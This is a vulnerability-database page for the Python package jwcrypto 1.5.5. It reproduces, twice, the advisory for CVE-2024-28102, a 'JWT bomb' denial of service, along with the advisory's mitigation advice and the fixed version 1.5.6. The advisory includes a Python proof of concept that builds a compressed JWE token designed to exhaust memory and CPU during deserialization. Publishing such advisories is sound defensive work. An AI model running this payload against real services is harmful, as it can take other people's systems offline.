VulnerableCode Package Details - pkg:pypi/jwcrypto@1.5.5

Search for packages

Vulnerability	Summary	Fixed by
VCID-ygj7-qwt8-sud5 Aliases: CVE-2024-28102 GHSA-j857-7rvv-vj97	JWCrypto vulnerable to JWT bomb Attack in `deserialize` function ## Affected version Vendor: https://github.com/latchset/jwcrypto Version: 1.5.5 ## Description An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this Token, it will consume a lot of memory and processing time. ## Poc ```python from jwcrypto import jwk, jwe from jwcrypto.common import json_encode, json_decode import time public_key = jwk.JWK() private_key = jwk.JWK.generate(kty='RSA', size=2048) public_key.import_key(*json_decode(private_key.export_public())) payload = '{"u": "' + "u" 400000000 + '", "uu":"' + "u" * 400000000 + '"}' protected_header = { "alg": "RSA-OAEP-256", "enc": "A256CBC-HS512", "typ": "JWE", "zip": "DEF", "kid": public_key.thumbprint(), } jwetoken = jwe.JWE(payload.encode('utf-8'), recipient=public_key, protected=protected_header) enc = jwetoken.serialize(compact=True) print("-----uncompress-----") print(len(enc)) begin = time.time() jwetoken = jwe.JWE() jwetoken.deserialize(enc, key=private_key) print(time.time() - begin) print("-----compress-----") payload = '{"u": "' + "u" * 400000 + '", "uu":"' + "u" * 400000 + '"}' protected_header = { "alg": "RSA-OAEP-256", "enc": "A256CBC-HS512", "typ": "JWE", "kid": public_key.thumbprint(), } jwetoken = jwe.JWE(payload.encode('utf-8'), recipient=public_key, protected=protected_header) enc = jwetoken.serialize(compact=True) print(len(enc)) begin = time.time() jwetoken = jwe.JWE() jwetoken.deserialize(enc, key=private_key) print(time.time() - begin) ``` It can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer. <img width="172" alt="image" src="https://github.com/latchset/jwcrypto/assets/133195620/23193327-3cd7-499a-b5aa-28c56af92785"> ## Mitigation To mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also been adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing attackers from exploiting this vulnerability with high compression ratio tokens. ## References [1] [CVE-2024-21319](https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-8g9c-28fc-mcx2)	1.5.6 Affected by 1 other vulnerability. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }}

Vulnerability

Summary

Fixed by

VCID-ygj7-qwt8-sud5
Aliases:
CVE-2024-28102
GHSA-j857-7rvv-vj97

JWCrypto vulnerable to JWT bomb Attack in `deserialize` function ## Affected version Vendor: https://github.com/latchset/jwcrypto Version: 1.5.5 ## Description An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this Token, it will consume a lot of memory and processing time. ## Poc ```python from jwcrypto import jwk, jwe from jwcrypto.common import json_encode, json_decode import time public_key = jwk.JWK() private_key = jwk.JWK.generate(kty='RSA', size=2048) public_key.import_key(**json_decode(private_key.export_public())) payload = '{"u": "' + "u" * 400000000 + '", "uu":"' + "u" * 400000000 + '"}' protected_header = { "alg": "RSA-OAEP-256", "enc": "A256CBC-HS512", "typ": "JWE", "zip": "DEF", "kid": public_key.thumbprint(), } jwetoken = jwe.JWE(payload.encode('utf-8'), recipient=public_key, protected=protected_header) enc = jwetoken.serialize(compact=True) print("-----uncompress-----") print(len(enc)) begin = time.time() jwetoken = jwe.JWE() jwetoken.deserialize(enc, key=private_key) print(time.time() - begin) print("-----compress-----") payload = '{"u": "' + "u" * 400000 + '", "uu":"' + "u" * 400000 + '"}' protected_header = { "alg": "RSA-OAEP-256", "enc": "A256CBC-HS512", "typ": "JWE", "kid": public_key.thumbprint(), } jwetoken = jwe.JWE(payload.encode('utf-8'), recipient=public_key, protected=protected_header) enc = jwetoken.serialize(compact=True) print(len(enc)) begin = time.time() jwetoken = jwe.JWE() jwetoken.deserialize(enc, key=private_key) print(time.time() - begin) ``` It can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer. <img width="172" alt="image" src="https://github.com/latchset/jwcrypto/assets/133195620/23193327-3cd7-499a-b5aa-28c56af92785"> ## Mitigation To mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also been adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing attackers from exploiting this vulnerability with high compression ratio tokens. ## References [1] [CVE-2024-21319](https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-8g9c-28fc-mcx2)

1.5.6
Affected by 1 other vulnerability.

Vulnerability	Summary	Aliases
This package is not known to fix vulnerabilities.

Vulnerability

Summary

Aliases

This package is not known to fix vulnerabilities.

Date	Actor	Action	Vulnerability	Source	VulnerableCode Version
2026-04-16T22:53:26.434826+00:00	GitLab Importer	Affected by	VCID-ygj7-qwt8-sud5	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/jwcrypto/CVE-2024-28102.yml	38.4.0
2026-04-12T00:11:48.724822+00:00	GitLab Importer	Affected by	VCID-ygj7-qwt8-sud5	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/jwcrypto/CVE-2024-28102.yml	38.3.0
2026-04-03T00:18:09.889862+00:00	GitLab Importer	Affected by	VCID-ygj7-qwt8-sud5	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/jwcrypto/CVE-2024-28102.yml	38.1.0
2026-04-01T16:04:46.608696+00:00	GHSA Importer	Affected by	VCID-ygj7-qwt8-sud5	https://github.com/advisories/GHSA-j857-7rvv-vj97	38.0.0